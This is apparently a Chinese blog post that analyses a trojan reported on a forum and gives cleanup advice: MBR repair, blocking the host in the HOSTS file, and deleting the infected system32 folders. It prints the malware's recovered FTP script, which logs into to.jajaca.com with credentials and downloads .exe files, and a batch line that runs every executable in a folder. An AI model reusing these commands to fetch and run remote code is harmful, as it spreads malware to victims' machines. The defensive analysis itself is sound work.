求助来源于电脑报论坛:360安全卫士不断出现木马提示,木马文件名有A12.exe、D001.exe、E001.exe、H001.exe、H002.exe、JACK.exe、JATE.exe等,位于system32下以i开头的后面有4个数字的文件夹中,如c:\windows\system32\i7460、c:\windows\system32\i5154等,360报出的木马名字有HEUR/Malware.QVM19.Gen、Malware.QVM07.Gen(注:QVM即Qihoo Virtual Machine,奇虎虚拟机引擎)、Win32/Trojan.Dropper.b73、Win32/Trojan.0d9<后门木马>、Win32/Backdoor.53e<后门木马>、Win32/Trojan.2e0<捆绑机病毒>、Win32/Worm.d83<蠕虫病毒>等,反复查杀不尽。
从求助者上传的样本中又找到两个文件:d.bat和j,d.bat的内容是:for %%i in (*.exe) do start %%i,这个循环(for)命令的作用是在当前目录下寻找exe文件(*.exe),然后执行它(start);而j文件的内存是:
open to.jajaca.com
Wmi
123
mget *.exe
bye
即FTP到to.jajaca.com,下载其中的exe木马文件到本地电脑(wmi和123是FTP登录的用户名与密码,现在不知道失效了没有,至少在当时还有效)。很明显这个木马是从指定的网址通过FTP下载木马文件到本地电脑并执行。
从网上信息看,有人说这种木马是鬼影病毒,一种引导型病毒,通过修改硬盘MBR以便在电脑启动时加载自身的病毒。不过经过求助者使用XueTr检测并没有发现MBR被修改,使用最新版本的金山鬼影专杀也没有发现鬼影。同时也没有发现有其它可疑的病毒木马启动项,如果不是没有检测出来,那么可能是属于局域网内传播过来的,毕竟上面有报一个蠕虫病毒,可能与此有关吧。据检测此木马还有破坏自动更新、创建病毒服务、检测网络(下载传播木马)等功能,由于我并没有在求助者扫描的日志中发现有新加服务项,可能是由于木马文件刚到就被杀除所以没有来得及创建(?)。
对于清除方案,如果真中了鬼影,首先要修复MBR,除使用fdisk/mbr外,用windows系统安装盘自带的修复功能也可以修复(用安装盘启动安装程序,按住R键进入修复平台,进入命令提示符状态,输入帐户名密码后输入Fixmbr,然后系统提示是否更新MBR主引导记录时选择“是”,并且再输入Fixboot修复boot区引导),或者交给杀毒软件和此类专杀,既然都研究那么透,自然有办法解决,修复完MBR再清理残余木马(为防止木马将病毒再次写入MBR,建议使用PE光盘启动杀毒)。如果不是鬼影,那么就直接清理木马,首先要做的是隔断与木马下载网站的联系,在HOSTS文件中加入一行:
127.0.0.1 to.jajaca.com
如果你中的木马所使用的FTP地址不是这个,请修改成相应的网址。隔绝后再删除system32下以i开头的后面跟4个数字的文件夹,如i7460,为避免误删,可以打开文件夹看看,就是上面说的这些文件,或者被杀毒软件杀过,就是空文件夹,这样就可以放心删除了(实在不放心,就先做备份),还有清理临时文件,再升级杀毒软件全盘查杀。做完这些,建议打好补丁,安装升级网络防火墙保护自己的电脑。(还有人说暂时禁用CMD.exe执行也可以临时性地阻止木马文件)
>> 除非说明均为原创,如转载请注明来源于http://www.stormcn.cn/post/1064.html
